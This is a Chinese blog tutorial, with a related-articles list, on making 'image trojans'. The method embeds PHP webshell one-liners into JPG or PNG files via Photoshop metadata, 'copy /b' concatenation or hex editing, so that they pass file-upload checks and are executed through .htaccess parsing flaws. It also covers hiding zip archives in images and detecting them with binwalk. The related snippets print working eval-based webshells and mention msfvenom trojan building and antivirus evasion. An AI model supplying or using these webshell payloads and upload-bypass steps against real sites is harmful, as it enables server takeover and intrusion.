图片木马制作方法详细教程

最新推荐文章于 2024-07-28 22:23:00 发布
最新推荐文章于 2024-07-28 22:23:00 发布
阅读量9.6k 收藏 102
点赞数 15
文章标签: 图片木马制作
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WJ_11_13/article/details/127499720
版权
本文介绍了如何将木马插入图片中,利用.htaccess等解析漏洞执行恶意代码。这种方法能绕过多种防护机制。详细讲述了三种图片马制作工艺,包括使用Photoshop、DOS命令和十六进制编辑器。同时,还探讨了图片隐写术,如何检测隐藏文件,并给出了实战案例。
摘要由CSDN通过智能技术生成

梗概

将写的木马插入到图片中,之后配合解析漏洞.htaccess等,对图片马进行解析,从而执行图片中的恶意代码;

优势

此方法可以绕过多种防护机制

图片马制作工艺

工艺一

PS工艺

在PS中制作图片马

先将一张图片放到PS中,之后点击左上角文件——>文件简介

在文档标题或者作者处写入一句话木马,如下图

 最后将带有一句话木马的图片导出

 工艺二

DOS(copy)命令

通过 copy/b 1.jpg/b+1yh.php muma.png  生成带有一句话木马的图片

图片隐写

梗概

通过图片隐藏信息,是一个合成的过程

加工流程

  1. 创建写有你要隐藏内容的文本文件

  2. 压缩你写的文本文件

  3. 把压缩包放到图片中,进行合成

  4. 图片越小的文件,制作工艺越纯良

实战

将压缩文件隐藏到图片中

先创建文件并压缩为zip

copy/b 1.jpg/b+gg.zip gg.jpg         #  将压缩文件gg.zip放到1.jpg图片中,合成文件命名为gg.jpg

此时生成的是图片文件,我们将后缀改为zip时,任然可以读取压缩包文件中的内容
# 因此 服务器是对文件后缀来对文件进行解析的,所以我们可以通过修改文件后缀来对图片进行访问

将图片隐藏到另一个图片

两个图片合成一张图片并命名为666.jpg
copy 1.jpg/b+905.png 666.jpg
如下图检测出此文件有两个图片格式

隐藏文件检测

kali中通过命令binwalk -e xx.png 来检测是否嵌入其他文件

# 如下图,此命令也将嵌入的隐藏文件输出出来了
┌──(root㉿GGbond)-[~]
└─# binwalk -e Desktop/gg.jpg --run-as=root

工艺三

十六进制编辑器写入

通过十六进制编辑器,将一句话木马写入图片中
这里拿EverEdit.exe 软件演示;
先通过EverEdit打开图片之后选择十六进制模式编辑

 末尾写入一句话木马,最后保存

爱吃仡坨
关注
28-5 文件上传漏洞 - 图片
weixin_43263566的博客
03-20 978
解析漏洞定义控制文件是否被当做后端脚本处理二、图片绕过图片;在图片中包含一句话木。利用其他解析漏洞如.htaccess等,对图片进行解析,执行其中的恶意代码。优势在于可以绕过多种防护机制。 1)使用Photoshop(ps),选择“文件”->“文件简介”,在文档标题或者作者处写入一句话木。 先准备一张图片(随便截图搞一张就好),然后准备一个一句话的php文件 解释:
图片木马制作的三种方法
afei001
02-08 1337
目录 1.图片木马简介 2.制作图片木马的三种方法 3.copy命令制作 4.photoshop制作 5.UltraEdit制作 6.总结 1.图片木马简介 图片木马,顾名思义就是包含可执行木图片。通过一定的手段将一句话木等程序加入到图片中,再将该木图片上传到网站,从而达到控制整个网站目的。 2.制作图片木马的三种方法 (1)copy命令制作; (2)photoshop插入制作; (3)二进制编辑器制作(比如:winhex、ultraEdit)...
制作图片木马教程
zhdd1234的专栏
09-15 2252
 何谓BMP网页木?它和过去早就用臭了的MIME头漏洞的木不同,MIME木是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行。  然而BMP木就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件
做一个图片图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码
最新发布
qq_48368964的博客
07-28 1538
图片:就是在图片中隐藏一句话木。利用.htaccess等。
图片木马制作
qq_46277212的博客
06-27 737
1.一张图片,jpg格式 1.jpg 2.一句话木 2.asp <?php eval requset ("value");?> 3.cmd: copy 1.jpg/b+1.asp/a 2.jpg 使用Notepad++打开可发现,在jpg文件底部有着木代码
web安全-文件上传漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6466
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
生成图片
2302_81133665的博客
05-20 574
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档windows系统和linux系统图片的生成@-windows系统-Linux系统。
制作——图片木马制作
weixin_50339082的博客
06-09 1万+
制作——图片木马制作 一、简单说明 图片木马指的是图片格式的文件木图片格式包括jpg,png等,原理是将木程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 二、制作方式 利用windows 命令 准备一个木,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass']); ?
android木制作方法,实现木病毒的详细步骤
热门推荐
weixin_28292761的博客
05-27 1万+
前言:有没有遇到过这种情况,打开邮件,发现一封非常正常的邮件,附带了连接,你不以为然的点进去,结果中木病毒了,这个套路是不是很熟悉,也很老套,但稍不注意就容易中木病毒,希拉里邮件门事件不就是这样么?!作为一名程序员,你是否想过怎样实现这样一个木病毒呢?来吧,这个项目就带你学习如何通过Metasploit的msfvenom命令来生成木、捆绑木以及对木进行免杀处理,带你一步步了解如何制作一...
php检测图片木马多进制编程实践
01-20
其实一开始我什么也不知道,只是后来在网上查了一些资料,找到的全是有制作图片木马教程,并没有找到检测的程序。 经过几番思索之后,决定从制作原理来分析这种木程序。这种木程序是十六进制编码写的,我灵机...
2024年网络安全最新【网络安全】 MSF生成木教程
2401_84281712的博客
05-03 313
这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限。1、当出现 meterpreter,表示成功入侵。2、设置Payload。
制作图片四种方式 cmd中 copy 1.jpg/b+2.php 3.jpg /b是二进制形式打开 /a是ascii方式打开 看到有人说一定要把图片放前面,木放后面才能
为了低调的博客
08-20 2005
看到有人说一定要把图片放前面,木放后面才能成功,我亲自试了这两种制作方式(另一种图片放后面),均能成功连接,但是后者的一句话木在文件开头,不推荐!/a是ascii方式打开。/b是二进制形式打开。
制作简单图片木马
Ro_kin的博客
07-20 9653
下面来制作一个简单的图片木马 我就把电脑桌面的一个图片作为例子吧 下面是原始图片: test.png 接下来写一句话木 新建一个muma.php文件,写入一句话木<?php eval($_POST['hh']); ?>然后在win+R,cmd,cd到原始图片的目录路径下 我的就是桌面了,输入copy test.png/b+muma.php/a muma.png如图: 桌面
图片制作
自在如风
09-07 6257
方法一 准备一张图片1.jpg,准备一句话php木1.php 通过控制台cmd命令制造图片 进入两个文件的文件夹打开控制台输入命令: copy 1.php/b+1.jpg 2.jpg 命令解释: 使用CMD制作一句话木。 参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件 参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件 copy 1.jpg/b+...
制作图片:二次渲染(upload-labs第17关)
m0_72286569的博客
03-12 2307
在本关的代码中这个imagecreatefromjpeg();函数起到了将上传的图片打乱并重新组合。这就意味着在制作图片的时候要将木插入到图片没有被改变的部分。
用bat制作图片——一句话木
AiENG_07的博客
11-29 1100
此命令关闭在控制台中回显命令,因此只有命令的输出可见,而不是命令本身。: 使用二进制拷贝将图像文件和 PHP 文件合并,并创建一个新的图像文件。使用 copy 命令将两个文件的内容合并,创建一个新的图像文件。: 提示用户将 PHP 文件拖放到窗口中,并按 Enter。: 提示用户确保图像文件和 PHP 文件位于相同的路径下。: 提示用户将图像文件拖放到窗口中,并按 Enter。提示用户输入图像文件和 PHP 文件的路径。: 用于接收用户输入的 PHP 文件路径。: 用于接收用户输入的图像文件路径。
简单图片木马的生成与利用
Deeeelete的博客
02-08 1万+
首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 c...
python yaml配置文件_python读取yaml配置文件
05-31
可以使用PyYAML库来读取yaml配置文件。以下是一个示例代码: ```python import yaml # 读取yaml配置文件 with open('config.yaml', 'r') as f: config = yaml.safe_load(f) # 打印配置项 print(config['database']['host']) print(config['database']['port']) print(config['database']['username']) print(config['database']['password']) ``` 其中,`config.yaml`是yaml配置文件的文件名,`safe_load`方法可以安全地加载yaml文件并返回一个Python对象。在这个示例中,我们假设配置文件中有一个`database`配置项,其中包括`host`、`port`、`username`和`password`等子项。我们可以通过`config['database']['host']`等方式来访问这些子项的值。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值